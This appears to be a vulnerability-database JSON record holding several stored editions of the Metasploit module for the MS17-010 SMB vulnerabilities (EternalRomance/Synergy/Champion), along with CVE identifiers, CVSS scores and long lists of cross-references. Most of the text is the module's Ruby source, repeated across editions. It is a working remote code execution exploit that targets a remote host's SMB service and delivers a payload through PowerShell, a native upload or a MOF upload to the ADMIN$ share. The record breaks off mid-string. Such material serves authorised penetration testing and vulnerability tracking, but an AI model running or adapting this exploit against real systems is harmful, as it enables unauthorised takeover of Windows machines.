"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 1997}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-07T20:08:39"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2018-05-11T21:18:06", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "metasploitReliability": "Normal", "modified": "2018-04-25T03:26:54", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n [ 'AKA', 'ETERNALSYNERGY' ],\n [ 'AKA', 'ETERNALROMANCE' ],\n [ 'AKA', 'ETERNALCHAMPION' ],\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n end\n\n def exploit\n begin\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn()\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'])\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 108}, "differentElements": ["modified", "sourceData"], "edition": 20, "lastseen": "2018-05-11T21:18:06"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-03-07T18:25:39", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-07T18:25:39", "value": 6.8, "vector": "NONE"}}, "hash": "79ede44b6880f46c946d2f2b7d2e514c", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2020-03-07T18:25:39", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 10\n },\n 'References' =>\n [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n end\n\n def exploit\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn()\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'])\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'])\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 1334}, "differentElements": ["published", "modified"], "edition": 124, "lastseen": "2020-03-07T18:25:39"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2018-05-20T19:18:01", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "metasploitReliability": "Normal", "modified": "2018-05-14T21:45:20", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n [ 'AKA', 'ETERNALSYNERGY' ],\n [ 'AKA', 'ETERNALROMANCE' ],\n [ 'AKA', 'ETERNALCHAMPION' ],\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n end\n\n def exploit\n begin\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn()\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'])\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'])\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 238}, "differentElements": ["published", "modified"], "edition": 25, "lastseen": "2018-05-20T19:18:01"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-08-23T19:06:33", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-23T19:06:33", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "67b81d82daf86b6b3d0a1c4896e1c0bc", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2020-08-23T19:06:33", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-06-09T12:18:52", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a 